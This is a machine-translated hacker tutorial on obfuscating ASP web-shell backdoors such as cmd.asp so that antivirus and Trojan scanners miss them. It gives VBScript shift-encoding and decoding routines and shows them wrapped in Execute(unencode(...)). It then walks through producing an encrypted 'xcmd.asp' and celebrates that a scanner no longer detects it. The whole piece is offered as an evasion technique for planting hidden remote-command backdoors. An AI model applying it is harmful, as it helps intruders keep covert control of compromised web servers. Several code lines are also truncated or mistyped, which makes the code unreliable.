Ultimate disguise of ASP Backdoors

I remember that when ASP Trojans came out, they were called "Never-killed Trojans". Haha, today, any anti-virus software can kill them with no effect, we can also "shell" ASP Trojans to avoid the impact of anti-virus software ideas by changing the Trojan shell (Oh, of course, not UPX ). What are you waiting? Read down.

In fact, this idea is very simple. It is to code ASP code and decode it during execution. Here there are two methods: one is to use the Microsoft tool script encoder; the other is to use the ASP Execute function.

Let's talk about script encoder first. This item can be provided free of charge on the official Microsoft website, and detailed instructions for use are provided. I will not talk about it here. However, after the file is encrypted, there will be <% @ Language = VBScript. encode %>. How can we decrypt it? Here is a decryption software (click to download it 《). Now you know, Microsoft's script encoder is not safe, so we have to write a program to "shell ".

The execute function of ASP is used to execute strings, that is, you can write ASP statements as strings and execute them with execute. For example, this line of code: Execute ("response. Write (" "hackerxfiles" ")"), the effect after execution is equivalent to executing response. Write ("hackerxfiles "). Because the stuff in the Execute function is a string, double quotation marks are required. Haha, since execute is a string, We can encrypt the stuff in it.

How to encrypt it? Well, use the simplest shift method. See the Code:

But = 1
Cc = Replace (NR, vbcrlf, "Hu ")
For I = 1 to Len (cc)
If mid (CC, I, 1) <> "Hu" then
PK = ASC (mid (CC, I, 1) +
If PK> 126 then
Primary = pk-95
Elseif PK <32 then
PK = PK + 95
End if
Temp = temp & CHR (PK)
Else
Temp = temp & "Hu"
End if
Next
Temp = Replace (temp ,"""","""""")
Response. Write (temp)

This code is the cyclic shift method under ASP. The variable but is the number of shifted digits, which can be modified. What is a loop? Because the program will compare the character ASCII code, it will be processed when it is greater than 126 or less than 32, so that the range is 32 ~ In the range of 126. This prevents characters that cannot be displayed in windows. This is also the reason why the carriage return linefeed is replaced at the beginning. Here I wrote a shift encryption ASP program XOR. asp attached, hope to help you.

Let's take a look at how to use the above Code to put response. write ("hackerxfiles"): "sftqpotf/xsjuf) # ibdlfsygjmft # *". Hey, this time the gods cannot understand it. ^_^

Since the password is added, you must decrypt it. Check the decryption code:

Function unencode (temp)
But = 1' this is the number of digits moved by the shift method! Note that the modification is the same as that used for encryption.
For I = 1 to Len (temp)
If mid (temp, I, 1) <> "Hu" then
PK = ASC (mid (temp, I, 1)-
If PK> 126 then
Primary = pk-95
Elseif PK <32 then
PK = PK + 95
End if
A = A & CHR (PK)
Else
A = A & vbcrlf
End if
Next
Unencode =
End Function

Well, now you know how to execute it. Just call this decryption function: Execute (unencode ("sftqpotf/xsjuf) # ibdlfsygjmft!

Here is an example to show you how to encrypt ASP Trojans. Because there are too many ASP Trojan code in the ocean, I am too lazy. Let's use the short and concise cmd. asp to demonstrate it!

Run the XOR. asp file I wrote, open cmd. asp in notepad, and copy the ASP code to the XOR. asp text box (see the figure ),

 

Fill in the shift parameter (here I use 1) and click "convert". The result is displayed. Create a new text document and run cmd. the content of ASP is copied, and the content of the previous unencode function is also added (note that the value of the variable "but" in the unencode function must be modified to be consistent with the value of the shift parameter selected during encryption ), then, it replaces the ASP part with the execute (unencode (HU) form, where Hu is assigned with the encryption result obtained in the previous step. Haha, and save it as an ASP file! Here I would like to say a few more. If the code is long, it can be divided into several parts for encryption, and then several execute operations are used. However, you must ensure the integrity of ASP code, that is to say, the associated Code such as if and end if cannot be divided into two executs.

Let's take a look. It can also run!

 

There is an ASP Trojan tracker in the 8-phase CD. Haha, we can use it to check our results today. Hey, look at the results, it's against cmd. the original version of ASP and the version 2005 of the top Ocean Network with Script encoder encrypted can be detected, and the xcmd we just crafted. ASP cannot detect anything! Haha